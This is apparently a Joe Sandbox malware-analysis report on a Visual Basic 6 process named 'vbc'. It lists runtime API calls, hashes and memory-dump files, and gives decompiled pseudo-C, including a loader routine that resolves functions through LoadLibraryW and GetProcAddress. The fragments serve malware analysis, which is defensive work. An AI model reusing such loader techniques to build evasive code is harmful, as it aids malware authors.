__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA8667F
__vbaRedim.MSVBVM60(00000080,00000001,72A1DE88,00000011,00000001,-00000001,00000000,?,?,00000000,00000000), ref: 0FA8669A
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA866AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA866DE
__vbaAryUnlock.MSVBVM60(?), ref: 0FA866E4
__vbaAryUnlock.MSVBVM60(?,?,00000000,00000000), ref: 0FA866F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,00000000,00000000), ref: 0FA86728
__vbaRedim.MSVBVM60(00000080,00000001,72A1DE88,00000011,00000001,-00000001,00000000,?,00000000,00000000), ref: 0FA86747
__vbaAryLock.MSVBVM60(?), ref: 0FA86757
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA8678B
__vbaAryUnlock.MSVBVM60(?), ref: 0FA86795
__vbaAryUnlock.MSVBVM60(?,0FA8680A,00000000,00000000), ref: 0FA867D8
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA867EA
__vbaFreeObj.MSVBVM60 ref: 0FA867F5
__vbaFreeObj.MSVBVM60 ref: 0FA867FA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA86802
__vbaFreeObj.MSVBVM60 ref: 0FA86807

Part of subcall function 0FA4A560: #644.MSVBVM60(?), ref: 0FA4A5E1
Part of subcall function 0FA4A560: __vbaAryLock.MSVBVM60(?), ref: 0FA4A5F3
Part of subcall function 0FA4A560: #644.MSVBVM60(0FA32FF6), ref: 0FA4A601
Part of subcall function 0FA4A560: __vbaAryUnlock.MSVBVM60(?), ref: 0FA4A610
Part of subcall function 0FA4A560: __vbaRedim.MSVBVM60(00000080,00000001,0FA881FC,00000011,00000001,?,00000000,?,?,00000004), ref: 0FA4A638
Part of subcall function 0FA4A560: __vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A64B
Part of subcall function 0FA4A560: #644.MSVBVM60(0FA32FF6), ref: 0FA4A659
Part of subcall function 0FA4A560: __vbaAryUnlock.MSVBVM60(?), ref: 0FA4A662
Part of subcall function 0FA4A560: __vbaAryLock.MSVBVM60(?), ref: 0FA4A66E

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$Free$Move$#644$LockUnlock$AddrefCopyRedim$#526$Destruct$FillMemoryZero
String ID:
API String ID: 2935032645-0
Opcode ID: 5d427ebe4bafaee2fd7a250783e0618cecf6007a24f56ce762e34b347f2962c2
Instruction ID: cae93bb01442735151ca946713069542994d1e1f5577325155d1f932f3980b5c
Opcode Fuzzy Hash: 5d427ebe4bafaee2fd7a250783e0618cecf6007a24f56ce762e34b347f2962c2
Instruction Fuzzy Hash: E2725071E00209AFDB14DFA4DD89EEEBBB9FF48711F108618F505A7285DB74A906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A1C0 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60(?,0FA78C80), ref: 0FA4A225
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000000,00000000), ref: 0FA4A23F
__vbaVarMove.MSVBVM60 ref: 0FA4A26B
__vbaVarZero.MSVBVM60 ref: 0FA4A29A
__vbaVarMove.MSVBVM60 ref: 0FA4A2C2
__vbaVarMove.MSVBVM60 ref: 0FA4A2E2
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A30E
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4A33A
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4A351
#644.MSVBVM60(?), ref: 0FA4A35F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A36B
__vbaAryLock.MSVBVM60(?,?,?,?,?,?), ref: 0FA4A399
#644.MSVBVM60(?), ref: 0FA4A3A7
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A3B3
__vbaVarVargNofree.MSVBVM60(?,?,?), ref: 0FA4A3D3
__vbaStrVarVal.MSVBVM60(?,00000000), ref: 0FA4A3DE
#644.MSVBVM60(00000000), ref: 0FA4A3E5
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A401
#644.MSVBVM60(?), ref: 0FA4A40F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A417
__vbaVarMove.MSVBVM60(?,?,00000000,00000000,?), ref: 0FA4A44B
__vbaFreeStr.MSVBVM60 ref: 0FA4A450
__vbaAryDestruct.MSVBVM60(00000000,?,0FA4A499), ref: 0FA4A492

Strings

@, xrefs: 0FA4A2CC

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$Move$LockUnlock$Redim$DestructEraseFreeNofreeVargZero
String ID: @
API String ID: 1191888646-2766056989
Opcode ID: 43d5e509bd2db9388daa76541a871b820630913ad8ef43b20e13896f6e545565
Instruction ID: 718ac79dd7eeffbcdb75b31203b982489df7051e1f8d16f737af6bf15dd9eebf
Opcode Fuzzy Hash: 43d5e509bd2db9388daa76541a871b820630913ad8ef43b20e13896f6e545565
Instruction Fuzzy Hash: C491F7B4D00219AFDB14DFA8D998EEEBBB9FF48310F008159F505A7245DB78A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A560 Relevance: 37.7, APIs: 25, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60(?), ref: 0FA4A5E1
__vbaAryLock.MSVBVM60(?), ref: 0FA4A5F3
#644.MSVBVM60(0FA32FF6), ref: 0FA4A601
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A610
__vbaRedim.MSVBVM60(00000080,00000001,0FA881FC,00000011,00000001,?,00000000,?,?,00000004), ref: 0FA4A638
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A64B
#644.MSVBVM60(0FA32FF6), ref: 0FA4A659
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A662
__vbaAryLock.MSVBVM60(?), ref: 0FA4A66E
#644.MSVBVM60(0FA32FF2), ref: 0FA4A67F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A688
#644.MSVBVM60(?), ref: 0FA4A68E
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?), ref: 0FA4A6CF

Part of subcall function 0FA4A830: __vbaRefVarAry.MSVBVM60(?,0FA4A5D1,?), ref: 0FA4A835
Part of subcall function 0FA4A830: __vbaUbound.MSVBVM60(00000001), ref: 0FA4A840

__vbaVarTstEq.MSVBVM60(?,0FA88208), ref: 0FA4A6F5
__vbaVarCmpNe.MSVBVM60(?,00008003,0FA88208), ref: 0FA4A736
__vbaVarOr.MSVBVM60(?,0000000B,00000000), ref: 0FA4A745
__vbaBoolVarNull.MSVBVM60(00000000), ref: 0FA4A74C
__vbaFreeVar.MSVBVM60 ref: 0FA4A75B
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4A781
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A794
#644.MSVBVM60(0FA32FF6), ref: 0FA4A7A2
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A7AB
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A7B8
#644.MSVBVM60(0FA32FF6), ref: 0FA4A7C6
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A7CE

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$LockUnlock$Redim$BoolFreeMoveNullUbound
String ID:
API String ID: 1580109814-0
Opcode ID: 23c8340deab45c5e0880bc1cdb5695d683ad6134815572d60f8a453d2a897eb7
Instruction ID: 5fe8a9a73316ce771da18797f98fd70c1ac5e45e1580baf0746a463555c433f0
Opcode Fuzzy Hash: 23c8340deab45c5e0880bc1cdb5695d683ad6134815572d60f8a453d2a897eb7
Instruction Fuzzy Hash: 1791DAB5D00209AFDB14DFE4C984EEEBBB9FF88710F10861AE505A7245EB74A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4CE80 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaVarDup.MSVBVM60(0FA32FF6,00000000,?), ref: 0FA4CED2

Part of subcall function 0FA4CDF0: __vbaVarVargNofree.MSVBVM60(0FA32FF6,00000000,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE33
Part of subcall function 0FA4CDF0: __vbaLenVarB.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE3E
Part of subcall function 0FA4CDF0: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE45

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,?,?,00000000), ref: 0FA4CEFE
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4CF0F
#644.MSVBVM60(0FA32FF6), ref: 0FA4CF21
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4CF2D
__vbaStrVarVal.MSVBVM60(?,?), ref: 0FA4CF3B
#644.MSVBVM60(00000000), ref: 0FA4CF42
__vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?), ref: 0FA4CF69
#608.MSVBVM60(?,00000000,?), ref: 0FA4CFBA
__vbaVarCat.MSVBVM60(?,?,00000008), ref: 0FA4CFCC
__vbaStrVarMove.MSVBVM60(00000000), ref: 0FA4CFD3
__vbaStrMove.MSVBVM60 ref: 0FA4CFDE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0FA4CFEA
__vbaFreeVar.MSVBVM60(0FA4D053,?), ref: 0FA4D037
__vbaFreeObj.MSVBVM60 ref: 0FA4D040
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4D04C

Strings

@, xrefs: 0FA4CF78

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$#644Move$#608DestructListLockNofreeRedimUnlockVarg
String ID: @
API String ID: 2913168291-2766056989
Opcode ID: 99f13bc5fe7a3e578d28a1b39585d708afaa84867f46e0f0020af8df5a6c7923
Instruction ID: 5b25b35d20ee3691136a235d14eaa8d82f03f975e01411fce9e6d2c5cd78bff5
Opcode Fuzzy Hash: 99f13bc5fe7a3e578d28a1b39585d708afaa84867f46e0f0020af8df5a6c7923
Instruction Fuzzy Hash: 1E5115B1D00249AFDB14DFA4D988EEEBBB8FF48711F10811AF516A7241DB746946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4CC40 Relevance: 13.6, APIs: 9, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaObjSetAddref.MSVBVM60(?,0FA85E9D,72A1A008,0FA32FF6,00000000), ref: 0FA4CC8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4CCB6
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4CCE4
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4CCF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4CD2A
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4CD34
__vbaVarMove.MSVBVM60 ref: 0FA4CD6F
__vbaFreeObj.MSVBVM60(0FA4CDB5), ref: 0FA4CDA2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4CDAE

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$AddrefDestructFreeLockMoveRedimUnlock
String ID:
API String ID: 1456570928-0
Opcode ID: f4747cd6f439168d2543182eaf4b6f855092090f378fb7fb42f1387e5542bc38
Instruction ID: be5810e04a37bad38d1c7f37278c9325c6b821d88eec77d8f0f283a9e2e70db3
Opcode Fuzzy Hash: f4747cd6f439168d2543182eaf4b6f855092090f378fb7fb42f1387e5542bc38
Instruction Fuzzy Hash: BE411CB0E10208AFDB04DFE8D989EEEBBB9FB48711F108209F505A7241D774A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA85B60 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaRedim.MSVBVM60(00000080,00000001,0FA88284,00000011,00000001,00004000,00000000,72A1DE99,72A46AEE,72A1C30A), ref: 0FA85BAD
__vbaAryLock.MSVBVM60(00000000,00000000,72A1DE99,72A46AEE,72A1C30A), ref: 0FA85BC2
#644.MSVBVM60(00000000), ref: 0FA85BDF
__vbaAryUnlock.MSVBVM60(00000000), ref: 0FA85BEB

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644LockRedimUnlock
String ID:
API String ID: 3120749027-0
Opcode ID: b573923a50d42ce7d97751cb7a93275d4633db30f8bcabd5ae08be062ffc1850
Instruction ID: 43d0fe6f95dce93ae48fa2973a103b6c5b01265464018bb801beabb1aadcf95d
Opcode Fuzzy Hash: b573923a50d42ce7d97751cb7a93275d4633db30f8bcabd5ae08be062ffc1850
Instruction Fuzzy Hash: 421182B4E40704EFDB14DF54D989FAABBB4FB04B21F448148F9056B391D7B8A852CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA85AE0 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0FA85AE0(void* __ebx, void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v8;
				intOrPtr _v24;
				intOrPtr _v36;
				char _v44;
				void* __esi;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t27;
				void* _t29;
				void* _t30;
				void* _t32;

				_v4 = 0x16;
				_t11 = E0FA85B60(__ebx, __edi, _t29, _t32); // executed
				_t30 = _t11;
				if(_t30 == 0) {
					return _t30;
				} else {
					RtlFillMemory(_t30, 0x16, 0);
					_t27 = __imp__#644;
					_t13 =  *_t27(_v8, __edi);
					_t3 = _t30 + 8; // 0x8
					_v24 = _t13;
					E0FA32F5D(_t13, _t3);
					_t16 =  *_t27(_v24);
					_t6 = _t30 + 4; // 0x4
					_v36 = _t16;
					E0FA32F5D(_t16, _t6);
					_v44 = 0xfa315b3;
					E0FA32F5D( *_t27( &_v44), _t30);
					return _t30;
				}
			}

0x0fa85ae7
0x0fa85aef
0x0fa85af4
0x0fa85af8
0x0fa85b58
0x0fa85afa
0x0fa85b00
0x0fa85b06
0x0fa85b11
0x0fa85b13
0x0fa85b18
0x0fa85b1c
0x0fa85b26
0x0fa85b28
0x0fa85b2d
0x0fa85b31
0x0fa85b3a
0x0fa85b47
0x0fa85b51
0x0fa85b51

APIs

Part of subcall function 0FA85B60: __vbaRedim.MSVBVM60(00000080,00000001,0FA88284,00000011,00000001,00004000,00000000,72A1DE99,72A46AEE,72A1C30A), ref: 0FA85BAD
Part of subcall function 0FA85B60: __vbaAryLock.MSVBVM60(00000000,00000000,72A1DE99,72A46AEE,72A1C30A), ref: 0FA85BC2
Part of subcall function 0FA85B60: #644.MSVBVM60(00000000), ref: 0FA85BDF
Part of subcall function 0FA85B60: __vbaAryUnlock.MSVBVM60(00000000), ref: 0FA85BEB

RtlFillMemory.KERNEL32 ref: 0FA85B00
#644.MSVBVM60(?), ref: 0FA85B11
#644.MSVBVM60(00000000,00000000,00000008), ref: 0FA85B26
#644.MSVBVM60(00000016,00000000,00000004), ref: 0FA85B43

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: #644$__vba$FillLockMemoryRedimUnlock
String ID:
API String ID: 3936800598-0
Opcode ID: b328a7d11c36b9f7844aa403359c7c07b590054529044dcee71057d2847462ba
Instruction ID: d040a118cd6e3ec841a452944cb0730975f8085e65f77d2d81f2df4ff48a4640
Opcode Fuzzy Hash: b328a7d11c36b9f7844aa403359c7c07b590054529044dcee71057d2847462ba
Instruction Fuzzy Hash: 6D0178B6A01311ABC220EBA4DD48E9BBBE8EFC4761F10891DF55997240D778D409CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA32BDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0FA32BDC(void* __ecx, intOrPtr* _a4) {
				char _v524;
				void* _t16;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__* _t26;
				void* _t33;
				char* _t38;
				char* _t41;

				_t38 = 0xfa316ae;
				_t33 = 0xfa88024;
				while( *_t38 != 0x71) {
					E0FA32B9E(_t16, _t38);
					E0FA32ECD( &_v524, "SysAllocStringByteLen", 0xffffffff);
					_t21 = E0FA32D5F( &_v524); // executed
					if(_t21 != 0) {
						_t26 = _t21;
						_t16 = 0x71;
						asm("repne scasw");
						_t41 = _t38;
						while( *_t41 != 0x71) {
							E0FA32BC0(_t16, _t41);
							_t24 = GetProcAddress(_t26, "SysAllocStringByteLen");
							if(_t24 != 0) {
								asm("stosd");
								_t16 = 0x71;
								asm("repne scasb");
								continue;
							}
							return _t24;
						}
						_t38 = _t41 + 1;
						continue;
					}
					return _t21;
				}
				 *0xfa8800c = 1;
				 *0x0FA8800E = 1;
				 *0x0FA88010 = 4;
				 *0x0FA88014 = 0;
				 *0x0FA88018 = _t33 - 0x80;
				 *0x0FA8801C = 0x20;
				 *0x0FA88020 = 0;
				 *_a4 = 0xfa8800c;
				return  !0x00000000;
			}

0x0fa32be8
0x0fa32bed
0x0fa32bf2
0x0fa32bf9
0x0fa32c0c
0x0fa32c18
0x0fa32c20
0x0fa32c24
0x0fa32c2b
0x0fa32c31
0x0fa32c34
0x0fa32c36
0x0fa32c3c
0x0fa32c49
0x0fa32c52
0x0fa32c56
0x0fa32c5e
0x0fa32c60
0x00000000
0x0fa32c62
0x00000000
0x0fa32c52
0x0fa32c66
0x00000000
0x0fa32c66
0x00000000
0x0fa32c20
0x0fa32c76
0x0fa32c7b
0x0fa32c81
0x0fa32c88
0x0fa32c8b
0x0fa32c8e
0x0fa32c95
0x0fa32c9b
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,SysAllocStringByteLen,0FA316AE,?,?,SysAllocStringByteLen,000000FF,0FA316AE), ref: 0FA32C49

Strings

SysAllocStringByteLen, xrefs: 0FA32C00, 0FA32C41, 0FA32C47

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: AddressProc
String ID: SysAllocStringByteLen
API String ID: 190572456-3231582829
Opcode ID: e55740ee322bec2e37e0140c98f5cc2e3b861bf7c198c209e3f637d723416f32
Instruction ID: 00ee84696d5c63f0f298632cf67b4739510b0cf43e7cb84a0a539db75e5d137d
Opcode Fuzzy Hash: e55740ee322bec2e37e0140c98f5cc2e3b861bf7c198c209e3f637d723416f32
Instruction Fuzzy Hash: 2111D676C047209AD3619F24C444B9BB7F5EB84350F508A29E0A68B2D2EFFCA58587D1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA32D5F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FA32D5F(WCHAR* _a4) {
				intOrPtr _t2;
				struct HINSTANCE__* _t4;
				intOrPtr _t6;

				if( *0xfa88008 != 0) {
					L13:
					_t4 = LoadLibraryW(_a4); // executed
					return _t4;
				}
				if( *0xfa88000 != 0) {
					L5:
					if( *0xfa88008 != 0) {
						L9:
						if( *0xfa88004 != 0) {
							goto L13;
						}
						E0FA32BC0(_t2, 0xfa31641);
						_t6 = E0FA32E01( *0xfa88000, "SysAllocStringByteLen");
						if(_t6 != 0) {
							 *0xfa88004 = _t6;
							goto L13;
						}
						return _t6;
					}
					E0FA32BC0(_t2, 0xfa315eb);
					_t2 = E0FA32E01( *0xfa88000, "SysAllocStringByteLen");
					if(_t2 != 0) {
						 *0xfa88008 = _t2;
						goto L9;
					}
					return _t2;
				}
				E0FA32B9E(_t2, 0xfa31650);
				_t2 = E0FA32E60("SysAllocStringByteLen");
				if(_t2 != 0) {
					 *0xfa88000 = _t2;
					goto L5;
				}
				return _t2;
			}

0x0fa32d69
0x0fa32df3
0x0fa32dfb
0x00000000
0x0fa32dfb
0x0fa32d76
0x0fa32d97
0x0fa32d9e
0x0fa32dc5
0x0fa32dcc
0x00000000
0x00000000
0x0fa32dd3
0x0fa32de3
0x0fa32dea
0x0fa32dee
0x00000000
0x0fa32dee
0x00000000
0x0fa32dea
0x0fa32da5
0x0fa32db5
0x0fa32dbc
0x0fa32dc0
0x00000000
0x0fa32dc0
0x00000000
0x0fa32dbc
0x0fa32d7d
0x0fa32d87
0x0fa32d8e
0x0fa32d92
0x00000000
0x0fa32d92
0x00000000

APIs

LoadLibraryW.KERNEL32(?,?,0FA32C1D,?,?,SysAllocStringByteLen,000000FF,0FA316AE), ref: 0FA32DFB

Strings

SysAllocStringByteLen, xrefs: 0FA32D82, 0FA32DAA, 0FA32DD8

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
